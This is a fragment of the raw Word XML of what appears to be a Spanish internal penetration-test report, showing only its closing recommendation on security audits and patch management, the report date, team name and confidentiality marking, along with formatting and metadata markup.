    <w:p w14:paraId="1C73DD0F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Posteriormente, realizar una auditoría de seguridad completa del sistema para identificar y corregir configuraciones inseguras adicionales. La implementación de un programa de gestión de parches formal es esencial para prevenir compromisos similares en el futuro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F43FD3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Fecha del informe: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 02 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Febrero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C413E0B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Equipo de seguridad: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Pruebas de Penetración Internas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF61546" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B75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s-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Clasificación:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t> CONFIDENCIAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049AD9DA" w14:textId="77777777" w:rsidR="004E763A" w:rsidRPr="000D2B75" w:rsidRDefault="004E763A" w:rsidP="000D2B75">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-EC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004E763A" w:rsidRPr="000D2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9641C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A50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63895"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3541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A970DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5FA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F42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE5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57927"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="554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1670E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8E02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C30807"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6980BD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C048B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2C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75DFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D66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8508C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C32C2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7422D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6A04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C013D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D0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F31CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BF0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F2974"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA72A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524C59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CC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C6BA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30989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555E1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A161D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3A1148"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A1C67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D6114C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E2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73B61"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6998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4110B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C9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D4418"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A9293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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="1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75"/>
    <w:rsid w:val="000D2B75"/>
    <w:rsid w:val="004E763A"/>
    <w:rsid w:val="00B1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565A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3CD87765-AF1B-43EA-8BC7-6300B156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D2B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D2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D2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0D2B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B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D2B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D2B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0D2B7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0D2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D2B75"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="d813de27">
    <w:name w:val="d813de27"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="000D2B7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D2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D2B7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D2B75"/>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D2B7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D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0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8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685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46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967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034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87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848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2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9616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4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107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976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7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1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37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0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942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9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49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109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615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7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488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6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775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319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182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917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2129</Words>
  <Characters>12137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MARCELO BORJA JIMENEZ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ROMARIO MARCELO BORJA JIMENEZ</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <cp:lastPrinted>2026-03-22T16:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-22T16:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-22T16:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>